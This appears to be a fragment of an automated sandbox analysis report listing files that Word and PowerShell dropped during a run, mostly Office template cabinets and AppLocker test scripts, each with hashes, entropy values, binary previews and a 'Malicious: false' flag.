                                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.a.p.o.r._.T.r.a.i.l...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD7DA8.tmp\Content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:modified
                                                                                                                                              Size (bytes):274
                                                                                                                                              Entropy (8bit):3.4699940532942914
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:fxnxUXGWWYlIWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxny2WzIgN2RGHmD0wbnKYZAH+Vwv
                                                                                                                                              MD5:55BA5B2974A072B131249FD9FD42EB91
                                                                                                                                              SHA1:6509F8AC0AA23F9B8F3986217190F10206A691EA
                                                                                                                                              SHA-256:13FFAAFFC987BAAEF7833CD6A8994E504873290395DC2BD9B8E1D7E7E64199E7
                                                                                                                                              SHA-512:3DFB0B21D09B63AF69698252D073D51144B4E6D56C87B092F5D97CE07CBCF9C966828259C8D95944A7732549C554AE1FF363CB936CA50C889C364AA97501B558
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .I.n.s.i.g.h.t. .d.e.s.i.g.n. .s.e.t...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD7DA8.tmp\Insight design set.dotx

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Word 2007+
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):3465076
                                                                                                                                              Entropy (8bit):7.898517227646252
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:98304:n8ItVaN7vTMZ9IBbaETXbI8ItVaN7vTMZ9IBbaEiXbY:8ItwNX9BvTvItwNX9BvoM
                                                                                                                                              MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                                                                                                                                              SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                                                                                                                                              SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
                                                                                                                                              SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........Y5B................[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.....g.../i..b../..}.-......U.....o.7B.......}@[..4o...E9n..h...Y....D.%......F....g..-!.|p.....7.pQVM.....B.g.-.7....:...d.2...7bA..Us.z.`.r..,.m."..n....s.O^.....fL.........7.....-...gn,J..iU..$.......i...(..dz.....3|

                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0mw1bdz1.mg1.psm1

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):60
                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hkntnioh.d03.ps1

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):60
                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kinbhusr.az0.ps1

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):60
                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kp1al5sg.kvh.psm1

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):60
                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xbabjbx3.dm0.psm1

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):60
                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ybhyvri1.1k2.ps1

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):60
                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab67C3.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 4410 bytes, 2 files, at 0x44 "PictureFrame.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):20554
                                                                                                                                              Entropy (8bit):7.612044504501488
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:zEAH676iPi8+IS5iqn7G8E0GftpBjExDxIHFLrHRN7Ke/ll7PK/pGaz6:zEhG8+ISrG8Pi6xDxCKoIGaz6
                                                                                                                                              MD5:486CBCB223B873132FFAF4B8AD0AD044
                                                                                                                                              SHA1:B0EC82CD986C2AB5A51C577644DE32CFE9B12F92
                                                                                                                                              SHA-256:B217393FD2F95A11E2C594E736067870212E3C5242A212D6F9539450E8684616
                                                                                                                                              SHA-512:69A48BF2B1DB64348C63FC0A50B4807FB9F0175215E306E60252FFFD792B1300128E8E847A81A0E24757B5F999875DA9E662C0F0D178071DB4F9E78239109060
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF....:.......D...........................:....?..................................PictureFrame.glox.................Content.inf........[.... '.q..@.........<./..+./. ...."o.o./..{^a.7^.D.HA....^J... ...........T%q..b...+pz.n.=....jT.+M..=H..A...py.3.........H...N...[..%..~....>.%....3.r...wx.....0.....7..94..2..45..7f.......D.. ...[...f.:H..../N..4.....8.....:x.I....u|.`."...\..N..%.M#..^v$.*....T.m.....?.-.wki.X..8..F.G..Y.^8...-....+.&.+&.No...e!.#.8.....YF.......<w.....=.Q.S..7....MW....M..9A.3..c..L....|.E-Y....]n".|....b9..l@.d.T...a.f...~.&k.[..yS..q..]L}..)w.....$.@..v...[9..X....V...a.NK....m9.5.....Kq.;9`.U.e...8.<..)Y.H........z.G...3n.yWa.g.>.w!e.B8:......f..h..z....o.1<.RT..WK...?g .N..+..p.B.|...1pR_......@...a....aA......ye..8...+M.l..(.d..f.;....g........8R.\.w.:ba....%...|p....`lrA.|....a.U.m=ld......7....#..?Dq..D.....(.5.K.a..c.G..7..]hF..%:}......}J.j$.....4...l];..v>.&j........Y.vk..$1.@X$...k...9..?...z..![..../...).a.=....aZ^.3?....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab67D4.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 3749 bytes, 2 files, at 0x44 "TabbedArc.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):19893
                                                                                                                                              Entropy (8bit):7.592090622603185
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:v3Zh3VlkpSIcgbA8E0GftpBjEmm3UFLrHRN7GYvlvQyUTL2mTAp:v31qp/A8Pi6mUqGGvU+mcp
                                                                                                                                              MD5:EF9CB8BDFBC08F03BEF519AD66BA642F
                                                                                                                                              SHA1:D98C275E9402462BF52A4D28FAF57DF0D232AF6B
                                                                                                                                              SHA-256:93A2F873ACF5BEAD4BC0D1CC17B5E89A928D63619F70A1918B29E5230ABEAD8E
                                                                                                                                              SHA-512:4DFBDF389730370FA142DCFB6F7E1AC1C0540B5320FA55F94164C0693DB06C21E6D4A1316F0ABE51E51BCBDAB3FD33AE882D9E3CFDB4385AB4C3AF4C2536B0B3
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF............D................................?..................c...............TabbedArc.glox.....c...........Content.inf.;....Y.[.........B.....?.T..ZD...........^C...U.R<Z....z+.I.....Z..-.V...f.....lB..\P.....=.-p....w ...\.kD..x'v..T..A..............".8...d.........FD.ZL.h..T...bp.)9B.v..i..VX...&..\..7.s..qy...l........Rty.Y...rU..>.9...8....L..\.^x.kDU.|TJ..{kN.G..E..$.kvy?.. mv......P..4.....q.1.6<u....e..dD...4.1E..Xi.5.=....1.P.c.K~S...YMO:.?..cL.g.tq\.(b1....E..0A.i..C...BT.m.S......:...}.&U..#QL..O.O../..K......=..........0a..O............BYP......>f.......iu...7.K..;QO~.t....%N.s.]>~#../7YN.....C..9.=cY.......y..U5.....,.....u.....#_..SG.`NR*.....?*..d.R.k.rX$...&.... ..h.4T.D^k-xA...............Hz..ep)e..4..P."fo Ne...o.....0n.Exr.........H..v...A.."..%)2......5...".}j.o8...E.HRQ;}.. .._L.+.jz....{.U..}...=B.o.^..vZ.:5.Z.M....y{\(...N..9...EB*MG...!N.vy..^...nE..2..@.;.4..C..t.4....h..O.8.=.m./...|Lu.|mCU..b.^.n39.h[M...%D{..w.1

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab67D5.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 5864 bytes, 2 files, at 0x44 "architecture.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):22008
                                                                                                                                              Entropy (8bit):7.662386258803613
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:M7FUtfIdqSHQs7G8E0GftpBjED/C4RQrFLrHRN7TT8DlvQyUTL2mH:sWgdqR2G8Pi6D6YQZTTMvU+mH
                                                                                                                                              MD5:ABBF10CEE9480E41D81277E9538F98CB
                                                                                                                                              SHA1:F4EA53D180C95E78CC1DA88CD63F4C099BF0512C
                                                                                                                                              SHA-256:557E0714D5536070131E7E7CDD18F0EF23FE6FB12381040812D022EC0FEE7957
                                                                                                                                              SHA-512:9430DAACF3CA67A18813ECD842BE80155FD2DE0D55B7CD16560F4AAEFDA781C3E4B714D850D367259CAAB28A3BF841A5CB42140B19CFE04AC3C23C358CA87FFB
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF............D................................?..................................architecture.glox.................Content.inf..q5.^...[.....0y......../..CL.C5.Q..U5g.z....UUUMPC...C..P....T.....=..s..4c...-3H..E...2..2*..T...../.i.;$..............%...................'h.........#0.......[........c.h.....O...%.61...[.J..:.,^....W.]$..u...N.R.....H.......:%I.g5Kd.n6...W2.#.UL..h.8NN../.P...H.;@.N.F...v."h..K.....~.....8...{.+...&.#A.Q'..A.....[NJ.X.....|.|.G5...vp.h.p..1.....-...gECV.,o{6W.#L....4v..x..z..)[.......T.....BQ.pf..D.}...H....V..[._.'.......3..1....?m..ad..c(K.......N.N.6F%.m......9...4..]?...l6..).\p;w.s....@...I%H.....;\...R......f...3~:C...A..x....X...>...:~.+..r@..."......I..m.y..)F.l..9...6....m...=..Q.F.z..u......J].{WX...V.Z.b.A0B..!....~.;Z.....K.`c..,X.MFz....].Q.2.9..L."...]...6...JOU..6...~../......4A.|.......i.LKrY...2.R.o..X.\....0.%......>H.....8.z..^....5d|...4|...C......R28.E......a....e...J.S..Ng.]<&..mm

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab67D6.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 4967 bytes, 2 files, at 0x44 "TabList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):21111
                                                                                                                                              Entropy (8bit):7.6297992466897675
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:wWZsOvbMZGgbA8E0GftpBjEtnFLrHRN7Dfll7PK/pirk:xZRvuzA8Pi6t9DPISk
                                                                                                                                              MD5:D30AD26DBB6DECA4FDD294F48EDAD55D
                                                                                                                                              SHA1:CA767A1B6AF72CF170C9E10438F61797E0F2E8CE
                                                                                                                                              SHA-256:6B1633DD765A11E7ED26F8F9A4DD45023B3E4ADB903C934DF3917D07A3856BFF
                                                                                                                                              SHA-512:7B519F5D82BA0DA3B2EFFAD3029C7CAB63905D534F3CF1F7EA3446C42FA2130665CA7569A105C18289D65FA955C5624009C1D571E8960D2B7C52E0D8B42BE457
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF....g.......D...........................g....?..........}.......................TabList.glox.................Content.inf....t....[......@..C...../.U5...........6...`.....T..>3.................=..09`..t......a..Y..BI.Z....=.'0...%...T..........H...>.:A.r......n..p...Pf.h...I.8... ....M.]&.#.vv'.....[c......g....>"......<c..f....i...sb!Z..iu<.%|......q.....G28.h-...7.....W.v...RtdK..F~.0.3.'.e..b7.c......a.3.....a\..]...gp8.+.u/}.w.qF........8.=.=|....\~..S.-q}]0...q.B.H.^J...!...a'.2Tn!..."..%........=.e_-.....{o..%o...a`.w..L.5..r.....e.8...pO..RE.Wgr..b.%.E...O.......8s...E....Um].C..M.....[...H.FZ..4...eZI.$..v.3<]..r....B..............8i......e<.D...Q4.q.^S.....H.b.......r.q..0o.......2..PP,."...JI...xU`.6f..K..Q9.Q..h..t....AI.S6...7............X..`dv..r..S....),7ES....#.....(...\.nh...X.ps%l..F...."<_....q....v........_.e.....P.........|&..fi..4..@..^0..v.]7.......^. ."..}(...w.g.X...=<....p.......L...P..XV....@:....N...Y....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab67D7.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 3144 bytes, 2 files, at 0x44 "VaryingWidthList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):19288
                                                                                                                                              Entropy (8bit):7.570850633867256
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:5ZII4Hf+7G8E0GftpBjCwBFLrHRN7bcClvQyUTL2mH:pG8PicgbcAvU+mH
                                                                                                                                              MD5:B9A6FF715719EE9DE16421AB983CA745
                                                                                                                                              SHA1:6B3F68B224020CD4BF142D7EDAAEC6B471870358
                                                                                                                                              SHA-256:E3BE3F1E341C0FA5E9CB79E2739CF0565C6EA6C189EA3E53ACF04320459A7070
                                                                                                                                              SHA-512:062A765AC4602DB64D0504B79BE7380C14C143091A09F98A5E03E18747B2166BD862CE7EF55403D27B54CEB397D95BFAE3195C15D5516786FEBDAC6CD5FBF9CD
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF....H.......D...........................H....?..................................VaryingWidthList.glox.................Content.inf...O.....[.... v.q......R.....>.%i.I.HhD.V...qt.....'....N...!..aw$(J.%(..A..h......l|.D.p9`..Y09.:.u....p. :,.*.YD=0.p. ......w.........*..<..;.....u.."......7[....8.....?^........-..;q.|.....B....PJ....r.K#.#.0'...}.........+gpR...T....5.iu.^I...A\..gK....}..z.B.nT.../.m.......N....E'1.E.\..o.....W..R.#.#...8.7...R.SbW-...%......$.obj.F..W_@....sY!........s.O..."k. ..b....j....v...P.\....7d...|"J.T...2p..m.&..r..,2.).....X.`...xt].U...b.h..V.....|L..N.Z.O#....o...1R.w30.g..?;..C.T.:$..MGY.C"i\.f..#..<.k...m..s.w. ..Ga].....wt.h|.Ta<.......(SO.]9.%a..Z... r._JH.=O...P.9a.v.....Kj.".T...m...4.?...F...$...y.....hbW.UA..u.&)....py.C{.=t.....n...}|H3A9.=..W..JJ..y./Y.E.M9..Z..w. .HB.YoIi..i.e..9;n...SpHw,....f....d>..g.m..z...... ...f...KP.M..U.....~vFD.fQ.P?......2!.n.....`@C!G...XI.].s,.X.'...u.E.o..f

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab67FA.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 6005 bytes, 2 files, at 0x44 "HexagonRadial.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):22149
                                                                                                                                              Entropy (8bit):7.659898883631361
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:b98FG/zdCbf7BOEawSi8E0GftpBjEPTFPxFLrHRN7S5ll7PK/pA2:N/zAbDae8Pi6PFPSRIA2
                                                                                                                                              MD5:66C5199CF4FB18BD4F9F3F2CCB074007
                                                                                                                                              SHA1:BA9D8765FFC938549CC19B69B3BF5E6522FB062E
                                                                                                                                              SHA-256:4A7DC4ED098E580C8D623C51B57C0BC1D601C45F40B60F39BBA5F063377C3C1F
                                                                                                                                              SHA-512:94C434A131CDE47CB64BCD2FB8AF442482F8ECFA63D958C832ECA935DEB10D360034EF497E2EBB720C72B4C1D7A1130A64811D362054E1D52A441B91C46034B0
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF....u.......D...........................u....?..................................HexagonRadial.glox.................Content.inf.........[.....`........./.mT.T6...CP..z5...0.PcUmCUSUCU.Q.P.0..f............^...H..2e.[..8...ld......*F.%.j.w!R..NA.L............ .r..z....$&.........P.=.r...O...e..dfv_.i%.C....^......?..x...+d..].B.3..EU...|Cc..z.`lQp..fr.....8!;.8.p.ZwH\.........~..T.t..]..H.]..S.2..Vt.....r.H../..-8........!:.Y&..|A..J.U...-.%..k..U...4m.. .q../..b.8.vc~......_q1.?..Bh.v.....L..I.$I..s.".u.. Y....I^5.v...3.......].^)b.t.j...=...Ze~.O...|.}T.._9c........L....BV.^......X..?.....{.>.j..5.m...d.7........g[..f.nST...i..t..|.T.jjS..4p.Pxu..*..W...|.A)..|9;....H.e.^.8D..S...M..Lj.|...M.m+..H.....8.&-....=.L.....n.v..M.9...l....=r......K.F.j.(.(xD.3..r'9.K..-...5..Z..x....._....a[...J...`.b_a\\j.ed..\.3.5....S.T...ms.....E...Xl.y.LH=...}..0.T...04.4..B[..H.....B{B9.h..=.8Mn.*.TL.c..y.s.?.c9$l...).h).6..;.X../_>Pl...O...U.R..v.dy$A

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab67FB.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 10800 bytes, 2 files, at 0x44 "ConvergingText.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):26944
                                                                                                                                              Entropy (8bit):7.7574645319832225
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:sbUX16g8/atF4NB3TJOvqeMRD/8svIZj/OwgbA8E0GftpBjEYwFLrHRN7mYll7PY:sbhg8yY4nMZK2hA8Pi6Yum4IVR
                                                                                                                                              MD5:F913DD84915753042D856CEC4E5DABA5
                                                                                                                                              SHA1:FB1E423C8D09388C3F0B6D44364D94D786E8CF53
                                                                                                                                              SHA-256:AA03AFB681A76C86C1BD8902EE2BBA31A644841CE6BCB913C8B5032713265578
                                                                                                                                              SHA-512:C48850522C809B18208403B3E721ABEB1187F954045CE2F8C48522368171CC8FAF5F30FA44F6762AFDE130EC72284BB2E74097A35FE61F056656A27F9413C6B6
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF....0*......D...........................0*...?..................t,..............ConvergingText.glox.....t,..........Content.inf..C..)t-[.....@.........=...xxA. ...E^....x.x.^.......x..^^...DF.......s..d.P.....5.;..]...2.t.w.....O9.G..;.'.T....@I.,.q.u.3..P...9... ....`J.......g.(....).,.h0.....$.3..;.._.....~.de.jj.....U..K.0....`.@.H.1.x.Z.@..q....?....x.wW.....+am8A".....I..)..]...s..-z.2S+|.Cb.t6f],.n.LV......OVg....O.at|..-..x.....:....]s...u..g}.P..v.3....^.".%..%...#.2.....l00...n.......r8.p.....^.....n.)..,..t.^$b...b.q.W...F..R...n.-.+..'........Aw=._OwH....8.:s..{.#..{N.hW..`.._........Wy....>U.?....-.8tg...=..y..@.,.v|......l...t..l#{...H....9..|......~...De..#@y.&K....U...q.c.zK..D.<pV.....Ql..&Y...=#...w....r.`#2....Ug.J(..T...KmW.@...!....j:......M......!..E.7#s.t..F.aU..N....-.i......|w.lr..G.n.,.......=Kl.-m.?F.....v]?.......{q.U.t...<.|..u.....3R.`.t.T.>;v.....KQ...S...7..1...N.kN.y.)v.....3H:..D.{.+.(......u..^W&.

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab67FC.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 5731 bytes, 2 files, at 0x44 "ThemePictureAlternatingAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):21875
                                                                                                                                              Entropy (8bit):7.6559132103953305
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:k73HRpZA6B3ulrnxtRT7G8E0GftpBjEdHqlFLrHRN7uhFlvQyUTL2m4c:k7XRgIkrG8Pi6dmuNvU+mp
                                                                                                                                              MD5:E532038762503FFA1371DF03FA2E222D
                                                                                                                                              SHA1:F343B559AE21DAEF06CBCD8B2B3695DE1B1A46F0
                                                                                                                                              SHA-256:5C70DD1551EB8B9B13EFAFEEAF70F08B307E110CAEE75AD9908A6A42BBCCB07E
                                                                                                                                              SHA-512:E0712B481F1991256A01C3D02ED56645F61AA46EB5DE47E5D64D5ECD20052CDA0EE7D38208B5EE982971CCA59F2717B7CAE4DFCF235B779215E7613AA5DCD976
                                                                                                                                              Malicious:false
